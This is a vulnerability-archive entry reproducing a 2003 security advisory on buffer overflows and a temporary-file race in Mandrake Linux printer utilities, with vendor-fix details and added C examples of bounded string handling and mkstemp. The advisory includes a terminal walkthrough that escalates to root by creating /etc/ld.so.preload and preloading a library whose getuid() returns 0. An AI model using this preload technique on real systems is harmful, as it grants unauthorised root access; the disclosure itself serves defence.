SecurityTracker.com
SecurityTracker
Archives
Category: Application (Generic) > Printer-drivers
Vendors: Mandriva/Mandrake

Mandrake Linux 'printer-drivers' Package May Yield Root Privileges to Local Users

SecurityTracker Alert ID: 1005959
SecurityTracker URL: http://securitytracker.com/id/1005959
CVE Reference: CVE-2003-0034, CVE-2003-0035, CVE-2003-0036
Updated: Jun 15 2008
Original Entry Date: Jan 21 2003
Impact: Execution of arbitrary code via local system, Modification of system information, Modification of user information, Root access via local system, User access via local system
Fix Available: Yes
Vendor Confirmed: Yes

Description:   Some vulnerabilities were reported in the 'printer-drivers' package distributed with Mandrake Linux. A local user could obtain root privileges on the system.

iDEFENSE reported bugs in several binaries included in the printer-drivers package.

A buffer overflow was reported in 'mtink' in the processing of the HOME environment variable. A local user can supply a specially crafted HOME environment variable to execute arbitrary code with 'sys' group privileges.

A buffer overflow was reported in 'escputil' in the parsing of the 'printer name' command line argument. A local user can supply a specially crafted printer name value to execute arbitrary code with 'sys' group privileges.

A race condition in the use of temporary files was reported in 'ml85p'. A local user with 'sys' group privileges could create a symbolic link from a predictable temporary file name to a critical file on the system or to an arbitrary file name. Then, when the binary is invoked, it will delete the contents of the linked file or create the specified arbitrary file with world-writable permissions. The local user could obtain root level privileges.

Impact:   A local user may be able to obtain 'sys' group privileges on the system. A local user with 'sys' group privileges may be able to obtain root level privileges on the system.
Solution:   The vendor has released a fix. See the Message History for a separate alert covering the Mandrake advisory or view the Mandrake advisory directly at:

http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:010

Vendor URL: http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:010
Cause:   Access control error, Boundary error, State error
Underlying OS:   Linux (Mandriva/Mandrake)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Mandrake Issues Fix) Mandrake Linux 'printer-drivers' Package May Yield Root Privileges to Local Users   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.
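The mtink overflow described above comes from an unbounded sprintf() of the HOME variable into a fixed 1024-byte stack buffer; the escputil bug is the same pattern with a command-line argument. The following C example is added here and is not code from mtink, escputil or the advisory; it shows a bounded replacement that refuses any untrusted string that does not fit, generalised so the same function serves an environment variable or an argument. The function names and the RC_PATH_MAX constant are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not mtink's own code. mtink's readRc() did
 *   sprintf(rcPath, "%s/.mtinkrc", getenv("HOME"));
 * into char rcPath[1024]; a HOME longer than the buffer overwrote the stack.
 * Here the untrusted input is only ever copied with an explicit bound and
 * the caller is told when it does not fit. The names below are assumptions. */
#define RC_PATH_MAX 1024

/* Build "<untrusted><suffix>" into out. Returns 0 on success, -1 if the
 * input is missing, not an absolute path, or would not fit (including NUL). */
int build_bounded_path(const char *untrusted, const char *suffix,
                       char *out, size_t outlen)
{
    if (untrusted == NULL || untrusted[0] != '/' || out == NULL)
        return -1;                             /* getenv() may return NULL */
    if (strlen(untrusted) + strlen(suffix) + 1 > outlen)
        return -1;                             /* refuse instead of truncating */
    int n = snprintf(out, outlen, "%s%s", untrusted, suffix);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened counterpart of readRc(): reads HOME from the environment and
 * returns 0 with rc_path filled, or -1 without writing past the buffer. */
int rc_path_from_env(char *rc_path, size_t len)
{
    return build_bounded_path(getenv("HOME"), "/.mtinkrc", rc_path, len);
}

/* Self-check helper: tries a constructed HOME of the given length against
 * a RC_PATH_MAX buffer and reports build_bounded_path's result. */
int try_home_of_length(size_t len)
{
    char rc[RC_PATH_MAX];
    char *home = malloc(len + 1);
    if (home == NULL || len == 0) { free(home); return -1; }
    memset(home, 'A', len);
    home[0] = '/';
    home[len] = '\0';
    int r = build_bounded_path(home, "/.mtinkrc", rc, sizeof rc);
    free(home);
    return r;
}
```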



Source Message Contents

Date:  Tue, 21 Jan 2003 13:59:21 -0500
Subject:  [VulnWatch] iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux printer-drivers Package



iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
printer-drivers Package
http://www.idefense.com/advisory/01.21.03.txt
January 21, 2003

I. BACKGROUND

MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
most default installations. Specifically, the following three binaries are
included:

mtink: a status monitor that tracks remaining ink quantity, printing of
test patterns, and changing and cleaning cartridges, etc. It is maintained
by Jean-Jacques Sarton (jj.sarton@t-online.de).

escputil: a utility to clean and align the heads of Epson Stylus printers.
It also checks current ink levels in the printer. It is maintained by
Robert Krawitz (rlk@alum.mit.edu) and Mike Sweet.

ml85p: a Linux driver for Samsung ML-85G series printers. It is maintained
by Rildo Pragana (rildo@pragana.net).


II. DESCRIPTION

Three vulnerabilities exist, the worst of which allows local root
compromise of a target system.

VULNERABILITY ONE: The mtink binary, installed set group id (gid) 'sys',
contains a buffer overflow in its handling of the HOME environment
variable. Successful exploitation provides an attacker with 'sys' group
privileges. The following snippet contains the offending segment of code:

void readRc(int idx)
{
    FILE *fp;
    char rcPath[1024];
    ...
    sprintf(rcPath,"%s/.mtinkrc",getenv("HOME"));

VULNERABILITY TWO: The escputil binary, installed set gid 'sys', contains a
buffer overflow in its parsing of the printer-name command line argument.
Successful exploitation provides an attacker with 'sys' group privileges.

VULNERABILITY THREE: The ml85p binary, installed set user id root,
contains a race condition in its opening of temporary files. Successful
exploitation provides an attacker with the ability to create or empty a
file with super user privileges. The following snippet contains the
offending segment of code:

    sprintf(gname,"/tmp/mlg85p%d",time(0));
    if (!(cbmf = fopen(gname,"w+"))) {

An attacker can easily guess the name of a temporary file and then link
the guessed file to a file at another location. If the other file does not
exist, it is created world-writeable; if it does exist, the contents of
the file are lost. ml85p is, by default, installed without execute
permissions for 'other':

$ ls -l /usr/bin/ml85p
-rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*

The binary, however, does provide execute permissions to the 'sys' group,
whose privileges can be gained using either of the two exploits in
VULNERABILITY ONE or TWO. Once 'sys' privileges are obtained, an attacker
can exploit this race condition.

The following example walks through a sample attack utilizing the
above-described methods:

$ id
uid=501(farmer) gid=501(farmer) groups=501(farmer)

$ ./escputil_ex
Usage : ./escputil_ex [offset]
Address : 0xbffff6b0
Exploiting...
Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
This is free software, and you are welcome to redistribute it
under certain conditions; type 'escputil -l' for details.
Cleaning heads...
lpr: unable to print file: client-error-not-found
/etc/profile.d/alias.sh:31: parse error: condition expected: !=

$ id
uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)

$ ls -l /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

$ ./ml85p_ex /etc/ld.so.preload
Press a key to clean/create /etc/ld.so.preload file
Wrong file format.
file position: ffffffff

$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload

$ cat > /tmp/lib.c <<EOF
heredoc> int getuid(void) { return 0; }
heredoc> EOF

$ gcc -fPIC -c /tmp/lib.c
$ gcc -o /tmp/lib.so -shared /tmp/lib.o

$ echo "/tmp/lib.so" > /etc/ld.so.preload

$ su -

# id
uid=0(root) gid=0(root) groups=0(root)


III. ANALYSIS

Any attacker with local access to a targeted system can launch this
attack. The ability to empty or create with root privileges any file on
the file system provides an attacker with many avenues of exploitation.
The above-described example is just one way of quickly gaining super user
privileges on a targeted system.


IV. DETECTION

Mandrake Linux 9.0 is vulnerable. By default, it includes the following
versions of the printer-drivers package:

printer-utils-1.0-76mdk
printer-filters-1.0-76mdk


V. VENDOR FIX / RESPONSE

MandrakeSoft has identified the problems and applied author-provided fixes
to the escputil and mtink vulnerabilities.  A patch written by Till
Kamppeter was applied to ml85p to fix that vulnerability.  Updates are
provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
packages, and ghostscript in 8.0 to fix these vulnerabilities
(MDKSA-2003:010).


VI. DISCLOSURE TIMELINE

10/06/2002      Issues disclosed to iDEFENSE
12/26/2002      Issues disclosed to jj.sarton@t-online.de, 
                rlk@alum.mit.edu, rildo@pragana.net, and 
                security@linux-mandrake.com
12/26/2002      Issues disclosed to iDEFENSE clients
12/26/2002      Vendor responses from rlk@alum.mit.edu, 
                jj.sarton@t-online.de
12/30/2002      Response from Vincent Danen (vdanen@mandrakesoft.com)
01/21/2003      Coordinated public disclosure


VIII. CREDIT

Karol Wiesek (appelast@bsquad.sm.pl) discovered these vulnerabilities.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world, from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .

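The ml85p temporary-file race in the advisory above turns on a predictable name (/tmp/mlg85p followed by the current time) opened with fopen(), which follows whatever symbolic link has already been planted there. This C example is added here and is not ml85p's own code or Till Kamppeter's patch; it shows the standard fix of creating the file with mkstemp(), which picks an unpredictable name and opens it with O_CREAT|O_EXCL so an existing link is never followed, and then verifies the descriptor before handing it to stdio. The function names and the /tmp/ml85pXXXXXX template are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Added example, not ml85p's own code. The original did
 *   sprintf(gname, "/tmp/mlg85p%d", time(0)); fopen(gname, "w+");
 * so a setuid-root process truncated or created whatever a guessable name
 * pointed at. mkstemp() replaces the XXXXXX with random characters and opens
 * with O_CREAT|O_EXCL and mode 0600; on success `path` holds the real name. */
FILE *open_private_tmp(char *path, size_t pathlen)
{
    const char tmpl[] = "/tmp/ml85pXXXXXX";     /* template is an assumption */
    if (path == NULL || pathlen < sizeof tmpl)
        return NULL;
    memcpy(path, tmpl, sizeof tmpl);
    int fd = mkstemp(path);
    if (fd < 0)
        return NULL;
    /* Defence in depth: the descriptor must be a regular file we own with a
     * single link. A symlink target or a hard-linked file fails this check. */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        unlink(path);
        return NULL;
    }
    FILE *fp = fdopen(fd, "w+");
    if (fp == NULL) {
        close(fd);
        unlink(path);
    }
    return fp;
}

/* Self-check: creates a temp file, confirms it is a regular file with mode
 * 0600 under the expected prefix, then removes it. Returns 1 on success. */
int selfcheck(void)
{
    char path[64];
    FILE *fp = open_private_tmp(path, sizeof path);
    if (fp == NULL)
        return 0;
    struct stat st;
    int ok = stat(path, &st) == 0 && S_ISREG(st.st_mode) &&
             (st.st_mode & 0777) == 0600 && strncmp(path, "/tmp/ml85p", 10) == 0;
    fclose(fp);
    unlink(path);
    return ok;
}
```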

Copyright 2014, SecurityGlobal.net LLC